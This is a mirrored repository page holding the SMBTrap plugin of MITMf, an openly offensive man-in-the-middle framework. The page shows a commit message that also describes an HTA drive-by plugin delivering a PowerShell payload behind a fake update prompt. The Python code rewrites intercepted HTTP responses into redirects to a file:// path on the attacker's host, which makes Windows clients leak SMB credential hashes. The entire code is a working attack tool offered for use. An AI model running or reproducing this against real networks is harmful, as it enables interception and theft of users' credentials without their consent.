mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-03-12 04:35:49 -07:00
5e2f30fb89
- The inject plugin now uses beautifulsoup4 to actually parse HTML and add content to it as supposed to using regexes - The logging of the whole framework has been compleatly overhauled - plugindetect.js now includes os.js from the metasploit framework for os and browser detection, let's us fingerprint hosts even if UA is lying! - New plugin HTA Drive-by has been added, prompts the user for a plugin update and makes them download an hta app which contains a powershell payload - the API of the plugins has been simplified - Improvements and error handling to user-agent parsing - Some misc bugfixes
39 lines
1.4 KiB
Python
39 lines
1.4 KiB
Python
# Copyright (c) 2014-2016 Marcello Salvati
|
|
#
|
|
# This program is free software; you can redistribute it and/or
|
|
# modify it under the terms of the GNU General Public License as
|
|
# published by the Free Software Foundation; either version 3 of the
|
|
# License, or (at your option) any later version.
|
|
#
|
|
# This program is distributed in the hope that it will be useful, but
|
|
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
|
# General Public License for more details.
|
|
#
|
|
# You should have received a copy of the GNU General Public License
|
|
# along with this program; if not, write to the Free Software
|
|
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
|
# USA
|
|
#
|
|
import random
|
|
import string
|
|
|
|
from plugins.plugin import Plugin
|
|
|
|
class SMBTrap(Plugin):
|
|
name = "SMBTrap"
|
|
optname = "smbtrap"
|
|
desc = "Exploits the SMBTrap vulnerability on connected clients"
|
|
version = "1.0"
|
|
|
|
def initialize(self, options):
|
|
self.ip = options.ip
|
|
|
|
def responsestatus(self, request, version, code, message):
|
|
return {"request": request, "version": version, "code": 302, "message": "Found"}
|
|
|
|
def responseheaders(self, response, request):
|
|
self.clientlog.info("Trapping request to {}".format(request.headers['host']))
|
|
rand_path = ''.join(random.sample(string.ascii_uppercase + string.digits, 8))
|
|
response.headers["Location"] = "file://{}/{}".format(self.ip, rand_path)
|